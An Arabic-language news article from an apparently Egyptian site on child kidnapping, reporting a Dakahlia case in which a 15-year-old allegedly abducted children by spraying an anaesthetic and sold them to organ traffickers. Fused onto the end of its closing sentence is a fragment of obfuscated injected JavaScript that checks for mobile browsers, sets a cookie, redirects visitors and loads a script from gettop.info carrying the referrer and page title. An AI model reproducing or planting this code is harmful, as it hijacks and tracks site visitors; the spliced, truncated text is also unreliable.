الرئيسية / الأسرة / إختطاف الأطفال بين إنعدام الانسانية وغياب المسئوليه

إختطاف الأطفال بين إنعدام الانسانية وغياب المسئوليه

أمانى محمد فهمى/عاطف عبد العزيز

انتشرت فى الآونه الاخيرة ظاهرة أصبحت بمثابة كابوس يثير الذعر للاسر المصرية ويشعرها بعدم الإمان والإستقرار الاسري ويسبب لها العيش فى حيرة وحزن وهى ظاهرة اختطاف الاطفال.ويكون خطف الاطفال عن طريق فرد او عصابة انعدمت في قلوبهم الرحمة والانسانية طامعين فى كسب المال بدون التفكير فى مصير الطفل وأسرته.

 

وخطف الاطفال يكون بقصد استغلالهم والاتجار بهم أو للاتجار باعضاءهم او بغرض الابتزار والحصول على فدية.فظاهرة التسول بالاطفال نراها راي العين فى الشوارع والاماكن العامة من اين جاء المتسول بهذا الطفل ليتسول به . وتنتشر على وسائل التواصل الاجتماعى صفحات أسسها بعض الشباب المجتهد للتنوية عن اختفاء الاطفال والبحث عنهم.فقد اصبح اختطاف الاطفال واقعا يدمر الاسرة ويهدد المجتمع

 

ومن المؤسف أن نجد عصابات تخصصت فى خطف الأطفال ويديرها أطفال أيضا” لا تتعدى أعمارهم 15 عاما” فقد تبين من تحقيقات النيابه العامه بدكرنس فى محافظة الدقهليه أن هناك طفل معاق يدعى “عصام ر.ع” 15 سنه يدير تشكيلا” عصابيا” لإختطاف الأطفال ثم يقوم ببيعهم لتجار الأعضاء البشريه مقابل 1000 جنيه عن كل طفل

 

وقد إعترف الطفل عصام بخطف 7 أطفال منذ شهر رمضان لعام 2015 ، وأن هناك سيده ضمن أفراد العصابه من قرية ميت الحلوج  تدعى وفاء تعمل بتوريد الأطفال للأطباء ورجال الأعمال والعصابات الأخرى بقرية الشبول بالمنزله

 

وعن الطريقه التى يقوم بها لخداع الأطفال وخطفهم يقول عصام “أقوم بتخدير الطفل عن طريق أنبوب إسبراى ، كما أقوم أيضا” بإستعطاف الأطفال لإدخالى دورة المياه بأى مسجد وبعد كده أرش بنج على أنفه فيفقد الطفل وعيه”  ثم أقوم بنقله بتوكتوك وأسلمه لوفاء مقابل 1000 جنيه

 

وقد تم نشر صور للطفل المعاق عصام زعيم عصابة خطف الأطفال بالدقهليه ، وقام الأهالى بتوزيع تعليمات للأسر بالقرى للحفاظ على أطفالهم وحمايتهم من الخطف ، وقد توجهت أسرة أحد الأطفال بإستغاثه عاجله للواء مجدى عبد الغفار وزير الداخليه بسرعة التدخل للعثور على نجلها المخطوف

 

فعلى من تقع المسئؤلية فهل هى على الأسرة وحدها أم الشرطة أم ضعف القانون على فلابد من العمل على حماية اطفالنا من الوقوع فى يد أناس فقدوا الرحمة والانسانية.فاذا ارادنا مواجهة هذا الخطر فعلى الجميع تحمل المسئولية فالاسرة عليها المتابعة والرقابة والتوعية.وعلى الشرطة التعامل السريع فى حالة البلاغ.وعلى الدولة تغليظ العقوبات القانونية والتعجل والإسراع بالحكم فى قضايا الخطف .فاطفالنا هم المستقبل وحمايتهم مسئوليتنا جميعاt|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

شاهد أيضاً

شيخ الأزهر: لا يمكن حصر أسباب ارتفاع نسبة الطلاق في «أمرين»

قال الإمام الأكبر الدكتور أحمد الطيب، شيخ الأزهر، إن أهم أسباب التى تؤدي للطلاق هو ...